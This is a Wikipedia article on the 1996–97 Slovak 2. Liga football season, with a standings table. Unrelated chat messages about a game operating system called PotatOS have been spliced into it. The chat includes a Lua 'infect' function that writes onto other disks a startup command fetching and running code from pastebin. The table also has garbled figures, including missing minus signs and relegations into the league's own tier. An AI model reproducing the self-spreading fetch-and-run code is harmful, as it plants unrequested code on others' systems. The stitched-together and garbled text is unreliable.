1996–97 2. Liga (Slovakia)

The 1996–97 season of the Slovak Second Football League (also known as 2. liga) was the fourth season of the league since its establishment. It began in late July 1996 and ended in June 1997.

2. liga
Season1996–97
ChampionsMŠK SCP Ružomberok
Promoted
Relegated
Matches played306
Goals scored833 (2.72 per match)

League standing

Pos Team Pld W D L GF GA GD Pts Promotion or relegation
1 MŠK SCP Ružomberok (C, P) 34 25 3 6 78 19 +59 78 Promoted to Mars superliga
2 Ozeta Dukla Trenčín (P) 34 24 2 8 68 30 +38 74
3 Tatran Devín 34 21 7 6 67 30 +37 70
4 Slovmag Jelšava 34 20 5 9 51 22 +29 65
5 Matador Púchov 34 19 4 11 59 43 +16 61
6 Slavoj Deva Trebišov 34 17 5 12 52 45 +7 56
7 NCHZ Nováky 34 14 9 11 43 32 +11 51
8 PFK Piešťany 34 15 5 14 43 49 6 50
9 VTJ Koba Senec 34 13 9 12 41 43 2 48
10 Bukóza Vranov nad Topľou[lower-alpha 1] 34 14 8 12 54 39 +15 47
11 ŠM Kohucsi Gabčíkovo 34 13 8 13 47 41 +6 47
12 Slovan Levice 34 12 5 17 47 58 11 41
13 ZŤS VTJ Martin 34 10 9 15 37 49 12 39
14 Tesla Stropkov 34 10 6 18 35 50 15 36
15 EX-Hlásnik Vráble (R) 34 8 6 20 27 69 42 30 Relegated to 2. Liga
16 Agro Hurbanovo (R) 34 9 1 24 33 78 45 28
17 ŠKP Bratislava (R) 34 6 6 22 27 52 25 24
18 FKM Nové Zámky (R) 34 7 0 27 29 89 60 21
Source:
(C) Champion; (P) Promoted; (R) Relegated.
Notes:
  1. 3 points deducted.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.

See also

References

  • Jindřich Horák, Lubomír Král: Encyklopedie našeho fotbalu, Libri 1997
  • Igor Mráz: Päť rokov futbalu, SFZ 1998
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.